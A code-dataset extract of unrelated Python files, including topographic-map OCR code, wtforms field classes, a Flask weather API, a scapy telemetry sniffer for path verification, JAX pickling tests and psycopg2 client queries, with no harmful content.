        """Return the map scale in feet per pixel (currently a hard-coded estimate)."""
        # The scale-bar detection below never worked reliably and is disabled.
        # row_size = 6
        # total = int(len(self.box_list) / 6)
        # idx = 0
        # nums = [(idx, int(char)) for idx, char in enumerate(self.box_list)
        # 		if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]
        # nums.sort(key=lambda val: self.box_list[val[0] + 2])
        # threshold = 3
        # prev_x = -1
        # prev_y = -2 * threshold
        # prev_num = -1
        # img = self.sub_image.copy()
        # lsd = cv2.createLineSegmentDetector(0)
        # lines = lsd.detect(img)[0]
        # drawn_img = lsd.drawSegments(img,lines)
        # cv2.imshow("LSD",drawn_img )
        # # h, w, _ = img.shape
        # # for (idx, num) in nums:
        # # 	cur_x = int(self.box_list[idx + 1])
        # # 	cur_y = int(self.box_list[idx + 2])
        # # 	cur_x2 = int(self.box_list[idx + 3])
        # # 	cur_y2 = int(self.box_list[idx + 4])
        # # 	print(str(num) + ": " + str(cur_x) + ", " + str(cur_y) + " :: " + str(cur_x2) + ", " + str(cur_y2))
        # # 	img = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)
        # # 	# if abs(cur_y - prev_y) < threshold:
        # # 	# 	dist = abs(cur_x - cur_y)
        # # 	# 	diff = abs(num - prev_num)
        # # 	# 	print("possibility found ^\n--------")
        # # 	# prev_x = cur_x
        # # 	# prev_y = cur_y
        # # 	# prev_num = num
        # img = cv2.resize(img, None, fx=1/6, fy=1/6,
        # 	interpolation = cv2.INTER_LINEAR)
        # cv2.imshow("blah", img)
        # print(nums)
        return 5280 / 790# hardcoded estimatem, ft per mile / pixel per mile = feet per pixel
    def __find_candidates_for_id_and_index(self, word_list, id_word, offset):
        """Return (index, number) pairs where `id_word` is followed at
        `offset` tokens by a numeric string in word_list."""
        candidates = []
        indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]
        for i in indices:
            if word_list[i+offset].isnumeric():
                cand = (i, int(word_list[i+offset]))
                candidates.append(cand)
        return candidates
    def __get_words(self):
        """OCR the legend strip; returns (word_list, box_list).

        Writes a temp PNG because pytesseract operates on files; the file
        is removed afterwards.
        """
        filename = "{}.png".format(os.getpid())
        cv2.imwrite(filename, self.sub_image)
        words = pytesseract.image_to_string(Image.open(filename))
        boxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config="hocr")
        os.remove(filename)
        word_list = words.split()
        box_list = boxes.split()
        return word_list, box_list
    @property
    def contour_interval_dist(self):
        # OCR lookup disabled: always report a 40-foot contour interval
        # unless the setter has been used.
        # if self._contour_interval_dist is None:
        # 	self._contour_interval_dist = self.__get_countour_interval_dist()
        # return self._contour_interval_dist
        # return 40
        return 40
    @contour_interval_dist.setter
    def contour_interval_dist(self, value):
        self._contour_interval_dist = value
    @property
    def feet_per_pixel(self):
        # lazily computed once, then cached on the instance
        if self._feet_per_pixel is None:
            self._feet_per_pixel = self.__get_feet_per_pixel()
        return self._feet_per_pixel
    @feet_per_pixel.setter
    def feet_per_pixel(self, value):
        self._feet_per_pixel = value
class TopographicMap:
    """A topographic map image plus the metadata extracted from it."""
    def __init__(self, filename):
        self.filename = filename
        # Crop away the map collar (margins with legend/labels); offsets
        # appear hard-coded for the scanned sheets used here — TODO confirm.
        self.image = cv2.imread(filename, 1)[500:-550, 500:-500]
        # self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]
        self.image_data = ImageData(self.image)
        self.height, self.width, self.channels = self.image.shape
if __name__ == '__main__':
    # Ad-hoc benchmark: denoise a crop whole vs. in four quadrants and
    # compare wall-clock time and the visual result.
    # img = Topographic_Map("SanLuisObispo.jpg")
    import numpy as np
    import time
    image = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]
    r, c, chan = image.shape
    # split the crop into four quadrants
    tl = image[:int(r/2), :int(c/2)]
    tr = image[:int(r/2), int(c/2):]
    bl = image[int(r/2):, :int(c/2)]
    br = image[int(r/2):, int(c/2):]
    s = time.time()
    img = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)
    e = time.time()
    print("total image: " + str(e-s))
    s = time.time()
    tl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)
    tr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)
    bl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)
    br = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)
    e = time.time()
    # stitch the quadrants back together for comparison
    top = np.concatenate((tl, tr), axis=1)
    bottom = np.concatenate((bl, br), axis=1)
    new_image = np.concatenate((top, bottom), axis=0)
    print("partitioned image: " + str(e-s))
    cv2.imshow('img', img)
    cv2.imshow('new_image', new_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
|
8,166 | 72b29764f584c7f824eaa63ab0fdb1839a8d9102 | from collections import OrderedDict
import re
from copy import copy
from datetime import datetime
import json
from bson import ObjectId
from bson.errors import InvalidId
from wtforms import Field
class StringField(Field):
    """wtforms string field with default substitution and optional filtering.

    empty_to_default: replace an empty (post-strip/filter) value with
        self.default instead of "".
    strip: strip surrounding whitespace from the submitted value.
    words_filter: optional object with a filter(value) method applied to
        the value (e.g. a banned-words filter) — TODO confirm contract.
    no_to_default: when the field is absent from the form data entirely,
        use self.default rather than None.
    """
    def __init__(self, label=None, validators=None, empty_to_default=True,
                 strip=True, words_filter=None, no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.strip = strip
        self.words_filter = words_filter
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        # values is the list of raw submitted values; only the first is used
        if values:
            value = values[0]
            if self.strip:
                value = value.strip()
            if self.words_filter:
                value = self.words_filter.filter(value)
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                self.data = value
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
class IntegerField(Field):
    """Form field that coerces the submitted value to int.

    An empty submission maps to self.default (or ""), a missing one to
    self.default (or None); an unparsable value raises ValueError after
    setting data to None.
    """
    def __init__(self, label=None, validators=None, empty_to_default=True,
                 no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if not values:
            # field absent from the form data entirely
            self.data = self.default if self.no_to_default else None
            return
        raw = values[0].strip()
        if raw == "":
            self.data = self.default if self.empty_to_default else ""
            return
        try:
            self.data = int(raw)
        except ValueError:
            self.data = None
            raise ValueError("invalid int: '{}'"
                             .format(values[0]))
class FloatField(Field):
    """Form field that coerces the submitted value to float.

    An empty submission maps to self.default (or ""), a missing one to
    self.default (or None); an unparsable value raises ValueError after
    setting data to None.
    """
    def __init__(self, label=None, validators=None, empty_to_default=True,
                 no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if not values:
            # field absent from the form data entirely
            self.data = self.default if self.no_to_default else None
            return
        raw = values[0].strip()
        if raw == "":
            self.data = self.default if self.empty_to_default else ""
            return
        try:
            self.data = float(raw)
        except ValueError:
            self.data = None
            raise ValueError("invalid float: '{}'"
                             .format(values[0]))
class BooleanField(Field):
    """Form field that maps the submitted string to a bool.

    Any stripped value not listed in false_values counts as True.
    """
    def __init__(self, label=None, validators=None, false_values=('false', '0'),
                 empty_to_default=True, no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.false_values = false_values
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if not values:
            # field absent from the form data entirely
            self.data = self.default if self.no_to_default else None
            return
        raw = values[0].strip()
        if raw == "":
            self.data = self.default if self.empty_to_default else ""
        else:
            self.data = raw not in self.false_values
class DateTimeField(Field):
    """Form field that parses the value into a datetime via strptime.

    format: strptime format string for parsing.
    tzinfo: optional tzinfo attached to the parsed (naive) datetime.
    empty_to_default / no_to_default: see StringField semantics.
    """
    def __init__(self, label=None, validators=None,
                 format='%Y-%m-%d %H:%M:%S', empty_to_default=True,
                 tzinfo=None, no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.format = format
        self.empty_to_default = empty_to_default
        self.tzinfo = tzinfo
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if values:
            value = values[0].strip()
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                try:
                    self.data = datetime.strptime(value, self.format)
                    # strptime yields a naive datetime; attach tz if given
                    if self.tzinfo:
                        self.data = self.data.replace(tzinfo=self.tzinfo)
                except ValueError:
                    self.data = None
                    raise ValueError("invalid datetime: '{}'"
                                     .format(values[0]))
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
class DateField(Field):
    """Form field that parses the value into a date via strptime().date().

    format: strptime format string for parsing.
    empty_to_default / no_to_default: see StringField semantics.
    """
    def __init__(self, label=None, validators=None, format='%Y-%m-%d',
                 empty_to_default=True, no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.format = format
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if values:
            value = values[0].strip()
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                try:
                    self.data = datetime.strptime(value, self.format).date()
                except ValueError:
                    self.data = None
                    raise ValueError("invalid datetime: '{}'"
                                     .format(values[0]))
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
class ObjectIdField(Field):
    """Form field that parses the value into a bson.ObjectId.

    empty_to_default / no_to_default: see StringField semantics.
    Raises ValueError (after setting data to None) on an invalid id.
    """
    def __init__(self, label=None, validators=None, empty_to_default=True,
                 no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if values:
            value = values[0].strip()
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                try:
                    self.data = ObjectId(value)
                except InvalidId:
                    self.data = None
                    raise ValueError("invalid ObjectId: '{}'"
                                     .format(values[0]))
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
class TagListField(Field):
    """Form field that splits a delimited string into a list of tags.

    sep: characters treated as delimiters (used inside a regex class).
    element_field: optional Field used to validate/convert each tag in
        post_validate; its errors propagate to this field.
    unique: drop duplicate tags while preserving first-seen order.
    empty_to_default / no_to_default: see StringField semantics.
    """
    def __init__(self, label='', validators=None, sep=",,、",
                 empty_to_default=True, element_field=None, unique=True,
                 no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.sep = sep
        self.empty_to_default = empty_to_default
        self.element_field = element_field
        self.unique = unique
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if values:
            value = values[0].strip()
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                # split on any of the sep characters, strip each piece,
                # and drop empties
                value = [v.strip() for v in re.split(
                    r"[{}]".format(self.sep), value)]
                value = [v for v in value if v != ""]
                if self.unique:
                    # dedupe while keeping first-seen order
                    value = list(OrderedDict.fromkeys(value))
                self.data = value
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
    def post_validate(self, form, stop_validation):
        """Validate each tag through element_field, replacing data with the
        converted values only if every tag passes."""
        if stop_validation:
            return
        if self.data is not None and self.element_field is not None:
            fields = []
            for v in self.data:
                # bind a fresh copy so per-element state does not leak
                field = copy(self.element_field).bind(form, '')
                field.process_formdata([v])
                if not field.validate(form):
                    self.errors.extend(field.errors)
                else:
                    fields.append(field)
            if len(self.errors) == 0:
                self.data = [v.data for v in fields]
class JsonField(Field):
    """Form field that parses the submitted value as JSON.

    An empty submission maps to self.default (or ""), a missing one to
    self.default (or None); invalid JSON raises ValueError after setting
    data to None.
    """
    def __init__(self, label=None, validators=None, empty_to_default=True,
                 no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        if not values:
            # field absent from the form data entirely
            self.data = self.default if self.no_to_default else None
            return
        raw = values[0].strip()
        if raw == "":
            self.data = self.default if self.empty_to_default else ""
            return
        try:
            self.data = json.loads(raw)
        except ValueError:
            self.data = None
            raise ValueError("invalid json: '{}'"
                             .format(values[0]))
class CompoundField(Field):
    """Form field that tries several sub-fields until one accepts the value.

    fields: candidate Field instances tried in order in post_validate; the
        first one that parses and validates the raw value wins, and its
        converted data replaces self.data.  Errors from failed candidates
        accumulate but are cleared when a later candidate succeeds.
    empty_to_default / no_to_default: see StringField semantics.
    """
    def __init__(self, label='', validators=None, empty_to_default=True,
                 fields=None, no_to_default=True, **kwargs):
        super().__init__(label, validators, **kwargs)
        self.empty_to_default = empty_to_default
        self.fields = fields or []
        self.no_to_default = no_to_default
    def process_formdata(self, values):
        # keep the raw string here; conversion happens in post_validate
        if values:
            value = values[0].strip()
            if value == "":
                self.data = self.default if self.empty_to_default else ""
            else:
                self.data = value
        else:
            # field missing from the submission
            if self.no_to_default:
                self.data = self.default
            else:
                self.data = None
    def post_validate(self, form, stop_validation):
        if stop_validation:
            return
        if self.data is not None:
            for field in self.fields:
                field = field.bind(form, '')
                try:
                    field.process_formdata([self.data])
                except ValueError as e:
                    # candidate could not parse the value; try the next one
                    self.errors.append(str(e))
                    continue
                if not field.validate(form):
                    self.errors.extend(field.errors)
                else:
                    # first fully-valid candidate wins; discard earlier errors
                    self.data = field.data
                    self.errors = []
                    break
|
8,167 | e98f28199075e55ddad32d9127f917c982e1e29d | import random
def generate_questions(n):
    """Run n quiz rounds: show a random 11..100 number, read the user's
    answer from stdin, and report when it is not the number's square."""
    for _ in range(n):
        number = random.randint(11, 100)
        print(number)
        answer = int(input())
        if answer != number ** 2:
            print('Wrong! the right answer is: {}'.format(number ** 2))
# Read the round count from stdin and run the quiz.
n=int(input())
generate_questions(n)
|
8,168 | 7ab964352c1d51b70e3a1a7bf0a624f2d96cfd55 | #dependencies go here
import numpy as np
import datetime as dt
from datetime import timedelta
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#Set up the engine to connect to HW8 database
# NOTE(review): credentials are hard-coded; move to config/env for real use.
postgresStr = ("postgresql://postgres:password@localhost:5432/HW8-sqlalchemy-vacation")
engine = create_engine(postgresStr)
# reflect existing tables/classes via SQLAlchemy automap
Base = automap_base()
Base.prepare(engine, reflect=True)
# Save reference to the tables
Measurement = Base.classes.measurements
Station = Base.classes.station
# Flask Setup
app = Flask(__name__)
# Set up flask routes
@app.route("/")
def home():
"""List all available api routes."""
return (
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/<start><br/>"
f"/api/v1.0/<start>/<end><br/>"
)
@app.route("/api/v1.0/precipitation")
def precip():
#Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.
#Return the JSON representation of your dictionary.
# Create our session (link) from Python to the DB
session = Session(engine)
#query the db, get a list of all precip measurements and dates
results = session.query(Measurement.date, Measurement.prcp).all()
session.close()
# Convert list of tuples into normal list
precip = list(np.ravel(results))
return jsonify(precip)
@app.route("/api/v1.0/stations")
def stations():
#Return a JSON list of stations from the dataset
# Create our session (link) from Python to the DB
session = Session(engine)
#query the db, get a list of the stations and their respective names
results = session.query(Station.station, Station.name).all()
session.close()
# Convert list of tuples into normal list
stationlist = list(np.ravel(results))
return jsonify(stationlist)
#query for the dates and temperature observations from a year from the last data point.
# return a JSON list of Temperature Observations (tobs) for the previous year.
@app.route("/api/v1.0/tobs")
def tobs():
    """Return (date, tobs) pairs for the final year of data, flattened."""
    # Create our session (link) from Python to the DB
    session = Session(engine)
    #find the last date in the dataset, query the prior year's temperature observations
    last = session.query(func.max(Measurement.date)).limit(1).all()
    q_end = last[0][0].strftime("%Y-%m-%d")
    q_start = (last[0][0]-dt.timedelta(days = 365)).strftime("%Y-%m-%d")
    # note: the range is [q_start, q_end) — the final day itself is excluded
    tobs_results = session.query(Measurement.date, Measurement.tobs).\
        filter(Measurement.date < q_end).\
        filter(Measurement.date >= q_start).all()
    session.close()
    # Convert list of tuples into normal list
    tobslist = list(np.ravel(tobs_results))
    return jsonify(tobslist)
@app.route("/api/v1.0/<start>")
def startonly(start):
# Create our session (link) from Python to the DB
session = Session(engine)
#find the last date in the dataset to use as an ending point for our temperature calculations
last = session.query(func.max(Measurement.date)).limit(1).all()
q_end = last[0][0].strftime("%Y-%m-%d")
stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).\
filter(Measurement.date <= q_end).all()
statslist = list(np.ravel(stats))
return jsonify({"StartDate":start,"EndDate":q_end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]})
#Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.
#When given the start only, calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date.
@app.route("/api/v1.0/<start>/<end>")
def daterange(start,end):
# Create our session (link) from Python to the DB
session = Session(engine)
stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
statslist = list(np.ravel(stats2))
return jsonify({"StartDate":start,"EndDate":end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]})
#Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.
#When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive.
# Run the Flask development server (debug mode; not for production use).
if __name__ == '__main__':
    app.run(debug=True)
|
8,169 | a1115766c5f17abc1ba90a3314cb5b9c4aab73d6 | import vobject
import glob
import sys
vobj=vobject.readOne(open("Nelson.vcf"))
print vobj.contents
def main(args):
    """Write a CSV summary (out.csv) of invoice data extracted from each file.

    NOTE(review): relies on `datos` and `catedraticos`, which are not
    defined anywhere in this file — presumably supplied elsewhere; confirm
    before running.  `suma` is accumulated but never used or reported.
    """
    suma = 0
    titulos = ['nombre del archivo', 'Total', 'subtotoal', 'rfc', 'fecha', 'ivaTrasladado', 'isrTrasladado', 'ivaRetenido', 'isrRetenido']
    import csv
    out = csv.writer(open("out.csv","w"), delimiter=',',quoting=csv.QUOTE_ALL)
    out.writerow(titulos)
    for argument in args:
        # extract the invoice fields for this file
        t = datos(argument)
        row = []
        # only sum totals for issuers not in the excluded set
        if not t["rfcEmisor"] in catedraticos:
            suma += t["total"]
        row.append(argument)
        row.append(t['total'])
        row.append(t['subTotal'])
        row.append(t['rfcEmisor'])
        row.append(t['fecha'])
        row.append(t['ivat'])
        row.append(t['isrt'])
        row.append(t['ivar'])
        row.append(t['isrr'])
        out.writerow(row)
if __name__ == '__main__':
    # Process files given on the command line, else every *.xml in the
    # working directory; pause (Python 2 raw_input) when none are found.
    if len(sys.argv[1:]) > 0:
        main(sys.argv[1:])
    else:
        files = glob.glob("*.xml")
        if files:
            main(files)
        else:
            raw_input("no hay archivos xml")
|
8,170 | 6c1f7b8e71760cac443a06f68f5f6ee3c2151e50 | # https://leetcode.com/problems/wiggle-subsequence/
#
# algorithms
# Medium (36.9%)
# Total Accepted: 43,722
# Total Submissions: 118,490
# beats 100.0% of python submissions
class Solution(object):
    def wiggleMaxLength(self, nums):
        """
        Return the length of the longest wiggle subsequence of nums.

        Fixes: the original used Python-2-only ``xrange`` (NameError on
        Python 3) and an O(n)-space DP table.  This greedy version is
        O(n) time / O(1) space: ``up`` (resp. ``down``) is the length of
        the longest wiggle subsequence so far ending on a rise (resp.
        fall); each rise extends ``down``, each fall extends ``up``, and
        equal neighbours change nothing.

        :type nums: List[int]
        :rtype: int
        """
        length = len(nums)
        if length < 2:
            return length
        up = down = 1
        for i in range(1, length):
            if nums[i] > nums[i - 1]:
                up = down + 1
            elif nums[i] < nums[i - 1]:
                down = up + 1
        return max(up, down)
|
8,171 | e4ecc1746e907f11936683384e1edb34dd637de7 | #!/usr/bin/env python
import sys
import struct
import Queue
import logging
import redis
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
from scapy.all import sniff, sendp, hexdump, get_if_list, get_if_hwaddr
from scapy.all import Packet, IPOption
from scapy.all import PacketListField, ShortField, IntField, LongField, BitField, FieldListField, FieldLenField, ByteField
from scapy.all import Dot1Q, IP, UDP, Raw
from scapy.layers.inet import _IPOption_HDR
from check.verification import Verification
# Running count of observed paths; mutated only in the sniff callback.
NUM = 0
# Redis connection used to clear switch-state keys ("s*") on shutdown.
redis_session = redis.Redis(host='localhost')
def get_if():
    """Return the name of the enp0s8 capture interface, or exit(1).

    NOTE(review): Python 2 code (print statement).  The initial `ifs`
    assignment is unused — the loop re-queries get_if_list().
    """
    ifs=get_if_list()
    iface=None
    for i in get_if_list():
        if "enp0s8" in i:
            iface=i
            break;
    if not iface:
        print "Cannot find enp0s8 interface"
        exit(1)
    return iface
class SwitchTrace(Packet):
    """One per-hop telemetry record: switch id, ingress port and rule id
    packed into 32 bits (6 + 6 + 20)."""
    fields_desc = [ BitField("swid", 0x0, 6),
                    BitField("inport", 0x0, 6),
                    BitField("rule", 0x0, 20)]
    def extract_padding(self, p):
        # consume nothing: the remaining bytes belong to the next record
        return "", p
class IVPOption_MRI(IPOption):
name = "MRI"
option = 31
fields_desc = [ _IPOption_HDR,
FieldLenField("length", None, fmt="B",
length_of="swtraces",
adjust=lambda pkt,l:l*2+4),
ShortField("count", 0),
PacketListField("swtraces",
[],
SwitchTrace,
count_from=lambda pkt:(pkt.count*1)) ]
def check_packet(queue):
    """Worker loop: block on the queue and verify each path forever.

    Runs in daemon threads started by main(); never returns.
    """
    while True:
        path = queue.get()
        verif = Verification()
        verif_path = verif.verif_packet(path)
def handle_pkt(pkt, q):
    """Sniff callback: extract the MRI per-hop trace and enqueue the path.

    Builds path as [[dst_ip, swid, inport, ruleid], ...] ordered first hop
    to last (records arrive last-hop-first, hence insert(0)), then puts
    [path, NUM, len(path), vlanid] on the worker queue.
    """
    #pkt.show2()
    global NUM
    count = 0
    path = []
    vlanid = pkt[Dot1Q].vlan
    while (count < pkt['MRI'].count):
        swid = pkt['MRI'].swtraces[count].swid
        inport = pkt['MRI'].swtraces[count].inport
        ruleid = pkt['MRI'].swtraces[count].rule
        dst_ip = pkt['IP'].dst
        path.insert(0, [dst_ip, swid, inport, ruleid])
        count = count + 1
    # NUM is only mutated here; sniff() invokes this callback serially
    NUM = NUM + 1
    q.put([path, NUM, len(path), vlanid])
    print("Path %i: %s and vlan ID: %d" % (NUM, path, vlanid))
    sys.stdout.flush()
def main():
    """Start verification workers, then sniff telemetry packets forever."""
    q = Queue.Queue(maxsize=0)
    workers = 5
    # daemon worker threads consume paths from the queue and verify them
    for i in range(workers):
        thread = Thread(target=check_packet, args=(q, ))
        thread.setDaemon(True)
        thread.start()
    iface = 'enp0s8'
    print 'Path Format [vlanID, [dst_ip, swID, inport, ruleID], ...]\n'
    sys.stdout.flush()
    try:
        sniff(filter='', iface = iface, prn = lambda x: handle_pkt(x, q))
    finally:
        # clear per-switch state keys from Redis on shutdown
        for key in redis_session.scan_iter("s*"):
            redis_session.delete(key)
# Script entry point.
if __name__ == '__main__':
    main()
|
8,172 | 79c8e87e1d247eef8dd1ca8e307bbe6d25bf48e2 | # Copyright 2021 The JAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
from absl.testing import parameterized
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax import core
from jax import numpy as jnp
from jax.config import config
from jax.interpreters import pxla
from jax._src import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
    """Check that transformed functions survive a cloudpickle round trip."""

    @unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
    def testPickleOfJittedFunctions(self):

        @jax.jit
        def f(x, y):
            return x * y

        @jax.jit
        def g(z):
            return f(z, z + 77)  # noqa: F821

        # Capture the reference result, serialize, drop the originals, and
        # make sure the revived callable still closes over f correctly.
        reference = g(32)
        payload = cloudpickle.dumps(g)
        del f, g

        revived = pickle.loads(payload)
        self.assertEqual(reference, revived(32))

    @unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
    def testPickleOfPmappedFunctions(self):

        @jax.pmap
        def f(x, y):
            return x * y

        @jax.pmap
        def g(z):
            return f(z, z + 77)  # noqa: F821

        reference = g(jnp.asarray([[32]]))
        payload = cloudpickle.dumps(g)
        del f, g

        revived = pickle.loads(payload)
        self.assertEqual(reference, revived(jnp.asarray([[32]])))
class PickleTest(jtu.JaxTestCase):
    """Round-trip JAX arrays and related objects through the stdlib pickle."""

    def testPickleOfDeviceArray(self):
        # A pickled array must come back as the same type with an equal
        # abstract value (shape/dtype), not just equal data.
        x = jnp.arange(10.0)
        s = pickle.dumps(x)
        y = pickle.loads(s)
        self.assertArraysEqual(x, y)
        self.assertIsInstance(y, type(x))
        self.assertEqual(x.aval, y.aval)

    def testPickleOfDeviceArrayWeakType(self):
        # Weak typing must be preserved by pickling.
        x = jnp.array(4.0)
        self.assertEqual(x.aval.weak_type, True)
        s = pickle.dumps(x)
        y = pickle.loads(s)
        self.assertArraysEqual(x, y)
        self.assertIsInstance(y, type(x))
        self.assertEqual(x.aval, y.aval)

    @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
    def testPickleOfKeyArray(self, prng_name):
        # PRNG keys must survive pickling for every PRNG implementation.
        with jax.default_prng_impl(prng_name):
            k1 = jax.random.PRNGKey(72)
            s = pickle.dumps(k1)
            k2 = pickle.loads(s)
            self.assertEqual(k1.dtype, k2.dtype)
            self.assertArraysEqual(jax.random.key_data(k1),
                                   jax.random.key_data(k2))

    @parameterized.parameters(
        (pxla.PartitionSpec(),),
        (pxla.PartitionSpec(None),),
        (pxla.PartitionSpec('x', None),),
        (pxla.PartitionSpec(None, 'y'),),
        (pxla.PartitionSpec('x', 'y'),),
        (pxla.PartitionSpec(('x', 'y'),),),
    )
    def testPickleOfPartitionSpecs(self, partition_spec):
        restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
        self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
        # PartitionSpec behaves as a tuple, so tuple equality is meaningful.
        self.assertTupleEqual(partition_spec, restored_partition_spec)

    def testPickleX64(self):
        # Serialize under x64, deserialize under x32: the value survives but
        # the dtype is downcast to load-time precision. The ordering of the
        # two context managers is the point of this test.
        with jax.experimental.enable_x64():
            x = jnp.array(4.0, dtype='float64')
            s = pickle.dumps(x)

        with jax.experimental.disable_x64():
            y = pickle.loads(s)

        self.assertEqual(x.dtype, jnp.float64)
        self.assertArraysEqual(x, y, check_dtypes=False)
        self.assertEqual(y.dtype, jnp.float32)
        self.assertEqual(y.aval.dtype, jnp.float32)
        self.assertIsInstance(y, type(x))

    def testPickleTracerError(self):
        # Tracers are abstract values; pickling one inside jit must raise.
        with self.assertRaises(core.ConcretizationTypeError):
            jax.jit(pickle.dumps)(0)
if __name__ == "__main__":
    # Use JAX's test loader so test sharding/filtering works as expected.
    absltest.main(testLoader=jtu.JaxTestLoader())
|
8,173 | 035a87ccf21d45b2c147da4315c2143bea1ff21d | import psycopg2
from .connection import get_connection
def get_clientes():
    """Return the result of selecting every client row."""
    columns = ('nombre, t_documento ,documento, telefono, direccion, correo, '
               'ciudad_circulacion, fecha_nacimiento, comercial, primas')
    query = 'SELECT ' + columns + ' FROM clientes'
    resultado = get_connection(query)
    return resultado
def get_clientes_by_id(_id):
    """Fetch a single client row by documento (id).

    Fixes: the original interpolated _id directly into the SQL (injection
    risk) — the value is now bound as a query parameter — and discarded the
    query result, which is now returned like get_clientes() does.
    """
    query = ('SELECT nombre, t_documento ,documento, telefono, direccion, correo, '
             'ciudad_circulacion, fecha_nacimiento, comercial, primas '
             'FROM clientes WHERE documento = %s')
    # Parameters are passed as a sequence, psycopg2-style — confirm that
    # get_connection forwards them to cursor.execute unchanged.
    return get_connection(query, (_id,))
def get_clientes_by_nombre(nombre):
    """Fetch clients whose nombre contains the given substring.

    Fixes: the original f-string had mismatched single quotes (it actually
    parsed as a `%` operation on a set literal and failed at runtime) and
    interpolated user input into SQL. The LIKE pattern is now bound as a
    parameter, and the result is returned.
    """
    query = ('SELECT nombre, t_documento ,documento, telefono, direccion, correo, '
             'ciudad_circulacion, fecha_nacimiento, comercial, primas '
             'FROM clientes WHERE nombre LIKE %s')
    return get_connection(query, ('%' + nombre + '%',))
def get_clientes_by_fecha(fecha):
    """Fetch clients whose birth date matches the given pattern.

    Fixes: the original had the same broken quoting / injection problem as
    get_clientes_by_nombre and — despite its name — filtered on `nombre`
    (apparent copy-paste bug). It now filters on fecha_nacimiento, cast to
    text so LIKE applies; TODO confirm the intended column against callers.
    """
    query = ('SELECT nombre, t_documento ,documento, telefono, direccion, correo, '
             'ciudad_circulacion, fecha_nacimiento, comercial, primas '
             'FROM clientes WHERE CAST(fecha_nacimiento AS TEXT) LIKE %s')
    return get_connection(query, ('%' + str(fecha) + '%',))
def create_pdf():
    # TODO: not implemented — presumably intended to export client data as a
    # PDF report (inferred from the name only; confirm intended behavior).
    pass
